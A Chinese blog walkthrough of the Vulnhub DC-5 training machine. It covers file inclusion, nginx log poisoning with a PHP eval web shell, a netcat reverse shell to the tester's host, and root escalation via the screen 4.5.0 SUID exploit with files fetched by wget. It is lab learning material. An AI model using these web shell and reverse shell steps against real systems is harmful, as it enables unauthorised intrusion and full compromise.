DC系列(5)DC-5靶机渗透

最新推荐文章于 2024-06-24 20:19:26 发布
最新推荐文章于 2024-06-24 20:19:26 发布
阅读量1k 收藏 5
点赞数 1
分类专栏: DC靶机 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43577567/article/details/122433677
版权

DC-5

0x00 前期准备

DC5地址:https://www.vulnhub.com/entry/dc-5,314/
DC5官wp:https://blog.mzfr.me/vulnhub-writeups/2019-07-09-DC5

  1. 导入成功。
    在这里插入图片描述

0x01 文件包含

  1. 常规nmap 172.20.10.0/24,扫描得到dc5地址172.20.10.5。
    在这里插入图片描述

  2. 80端口开放,访问网页,得知是nginx服务器。
    在这里插入图片描述

  3. 点击网页的contact,发现可以提交表单。随意填写一个试试。
    在这里插入图片描述

  4. 点击submit,成功后出现thankyou.php,可以看到URL中会有提交的数据。
    在这里插入图片描述

  5. 开启代理,burp抓包,右键发送到repeater中重放,发现< footer >标签内的copyright一直变化(网页中显示2020,此处就是2019了)。

  6. 怀疑文件包含,爆破网页目录。先回到172.20.10.5/contact.php,重新抓包,发送至intruder,add添加contact。
    在这里插入图片描述

  7. 在payload中选择load添加dirbuster的字典(路径:/usr/share/wordlists/dirbuster)。
    在这里插入图片描述

  8. 执行,查看状态栏为200的页面(如果不修改线程数,运行速度极慢,此处仅跑出三个页面,选择另一种方法继续)。
    在这里插入图片描述

  9. 或者,使用dirbuster(普通dirb无法探测到有用页面)。dirbuster启动,在页面中按实际情况选择填写,右下角start。

    dirbuster使用参考:https://zhuanlan.zhihu.com/p/273636301

    在这里插入图片描述

  10. 在scan information的所有进程到100%后,切换到result栏查看结果。同样看到了/footer.php。
    在这里插入图片描述

  11. 基本可以确定/footer.php是/thankyou.php的文件包含,访问http://172.20.10.5/thankyou.php?file=footer.php,测试结论成立。
    在这里插入图片描述

  12. 可以继续通过抓包更改url,此处直接使用firefox中的max hackbar插件修改参数。观察php伪协议是否被过滤,php://input用于执行php代码,如图没有回显,同理data伪协议也无回显。

    文件包含利用漏洞参考:https://www.cnblogs.com/guoqingsentou/p/13695449.html

    在这里插入图片描述

  13. 回到原来的思路,访问常见可利用文件。分别访问/etc/passwd、/etc/shadow,仅passwd有回显,但没用。

    在这里插入图片描述

  14. 最开始访问页面时,wappalyzer提示dc5服务器是nginx,访问nginx系统日志路径/var/log/nginx/access.log、/var/log/nginx/error.log。其中access.log和error.log都应该有回显。
    在这里插入图片描述

    在这里插入图片描述

  15. 注意,如果前面的access.log无法回显、后续操作都不可行,说明日志里已存在php语法错误,后面的内容无法加载。删除dc5靶机再重装吧。

0x02 获得shell

  1. 利用access.log。抓包在burpsuite-repeater中,把url修改为一句话木马GET <?php phpinfo();?>,回显400 bad request。
    在这里插入图片描述

  2. 再次访问:http://172.20.10.5/thankyou.php?file=/var/log/nginx/access.log,可以看到显示了php信息,意识到可以通过这个方式写入木马。
    在这里插入图片描述

  3. 写入一句话木马:GET <?php @eval($_POST['nikris']);?>
    在这里插入图片描述

  4. 使用蚁剑连接,此处我用的windows主机的软件,密码就是POST[’’]内。

    kali蚁剑安装参考:https://blog.csdn.net/liver100day/article/details/120222378

    在这里插入图片描述

  5. 连接成功后,向/tmp里写入一句话木马。
    在这里插入图片描述

  6. 回到kali,访问/tmp/shell,可以看到footer变成了预设的test,连接有效。
    在这里插入图片描述

  7. 在蚁剑的数据管理区中,选择dc5右键打开虚拟终端,反弹shell:nc -e /bin/bash 172.20.10.3 7788。在这之前,kali主机开启7788端口:nc -lvvp 7788
    在这里插入图片描述

  8. 返回交互式:python -c 'import pty;pty.spawn("/bin/bash")',成功。
    在这里插入图片描述

0x03 screen漏洞提权

  1. 使用find / -perm -4000 2>/dev/null查找具有SUID权限的文件,发现screen-4.5.0。
    在这里插入图片描述

  2. 使用searchsploit查找该命令漏洞:searchsploit screen 4.5.0 -w
    在这里插入图片描述

  3. 点进41154漏洞报告url查看,解读并按照指引操作。
    在这里插入图片描述

  4. 复制框内代码,写入/tmp/libhax.c,执行编译。
    在这里插入图片描述
    在这里插入图片描述

  5. 同理,写入rootshell.c,编译。
    在这里插入图片描述
    在这里插入图片描述

  6. 构造dc5.sh脚本,第一行加入#!/bin/bash,最后一行加上:set ff=unix命令将原本的dos格式换行符变为unix格式。
    在这里插入图片描述
    在这里插入图片描述

  7. 得到所需的三个文件:dc5.sh、libhax.so、rootshell。

    在这里插入图片描述

  8. 在此目录下开启5566端口:python2 -m SimpleHTTPServer 5566,靶机切换到/tmp目录,wget 172.20.10.3:5566/xxxx,下载这三个文件。
    在这里插入图片描述

  9. 为dc5.sh添加可执行权限:chmod +x dc5.sh,执行./dc5.sh
    在这里插入图片描述

  10. 验证权限,切换到/root根目录找到flag,渗透成功。
    在这里插入图片描述

Nikris
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC5-靶机
Au
08-29 2186
下载地址 作者已经做了一个提示视频,地址 配置的环境: kali:192.168.25.131 DC5-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.135,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1...
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-5靶机渗透
m0_62008601的博客
05-21 660
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC5靶机渗透
最新发布
qq_63523232的博客
06-24 415
nmap漏洞扫描没有利用点。
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 428
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
dc-5 靶机渗透学习
..
03-20 1913
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC-5靶机
m0_62094846的博客
07-01 373
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.133 -p- -oN nmap133.A(中途IP改成了192.168.61.134)开放了80,111,39542打开显示的IP地址 在concat界面把信息填写,就会跳转页面,是GET传参 反复刷新会发现时间有变化,猜测页面存在文件包含(?)然后用burp爆破页面(御剑扫不出来)一共7个 footer可以看到这个,确认这
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC5靶机
qq_40646572的博客
05-04 340
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC-5 靶机渗透
Rex_Surprise的博客
05-10 268
DC-5 靶机渗透 1.渗透过程 THEEND! DC-5 靶机渗透1.渗透过程 开始,扫描主机: netdiscover -r 192.168.0.1/24 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc. 扫端口: nmap -sS -A -p- ...
vulnhub之DC5靶机
LainWith的博客
08-15 606
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC靶机系列DC-5
Ays.Ie的博客
02-27 411
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7078
DC-5靶机渗透测试详细教程
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值